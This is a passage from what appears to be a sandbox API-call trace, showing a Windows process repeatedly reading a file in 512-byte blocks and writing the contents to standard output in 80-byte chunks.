lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.715] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.715] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] GetFileType (hFile=0x4c) returned 0x1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] GetFileType (hFile=0x4c) returned 0x1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] GetFileType (hFile=0x4c) returned 0x1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] GetFileType (hFile=0x4c) returned 0x1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] GetFileType (hFile=0x4c) returned 0x1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] GetFileType (hFile=0x4c) returned 0x1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] GetFileType (hFile=0x4c) returned 0x1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] GetFileType (hFile=0x4c) returned 0x1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.716] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.716] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] GetFileType (hFile=0x4c) returned 0x1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] GetFileType (hFile=0x4c) returned 0x1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] GetFileType (hFile=0x4c) returned 0x1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] GetFileType (hFile=0x4c) returned 0x1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] GetFileType (hFile=0x4c) returned 0x1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] GetFileType (hFile=0x4c) returned 0x1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] GetFileType (hFile=0x4c) returned 0x1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] GetFileType (hFile=0x4c) returned 0x1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.717] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.717] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] GetFileType (hFile=0x4c) returned 0x1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] GetFileType (hFile=0x4c) returned 0x1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] GetFileType (hFile=0x4c) returned 0x1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] GetFileType (hFile=0x4c) returned 0x1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] GetFileType (hFile=0x4c) returned 0x1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] GetFileType (hFile=0x4c) returned 0x1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] GetFileType (hFile=0x4c) returned 0x1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] GetFileType (hFile=0x4c) returned 0x1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.718] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.718] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] GetFileType (hFile=0x4c) returned 0x1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.719] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] GetFileType (hFile=0x4c) returned 0x1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] GetFileType (hFile=0x4c) returned 0x1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] GetFileType (hFile=0x4c) returned 0x1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] GetFileType (hFile=0x4c) returned 0x1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] GetFileType (hFile=0x4c) returned 0x1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] GetFileType (hFile=0x4c) returned 0x1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.720] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] GetFileType (hFile=0x4c) returned 0x1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] GetFileType (hFile=0x4c) returned 0x1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] GetFileType (hFile=0x4c) returned 0x1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] GetFileType (hFile=0x4c) returned 0x1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] GetFileType (hFile=0x4c) returned 0x1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] GetFileType (hFile=0x4c) returned 0x1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] GetFileType (hFile=0x4c) returned 0x1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] GetFileType (hFile=0x4c) returned 0x1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.722] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] GetFileType (hFile=0x4c) returned 0x1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] GetFileType (hFile=0x4c) returned 0x1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] GetFileType (hFile=0x4c) returned 0x1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] GetFileType (hFile=0x4c) returned 0x1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] GetFileType (hFile=0x4c) returned 0x1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] GetFileType (hFile=0x4c) returned 0x1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] GetFileType (hFile=0x4c) returned 0x1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] GetFileType (hFile=0x4c) returned 0x1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.723] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] GetFileType (hFile=0x4c) returned 0x1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] GetFileType (hFile=0x4c) returned 0x1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] GetFileType (hFile=0x4c) returned 0x1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, 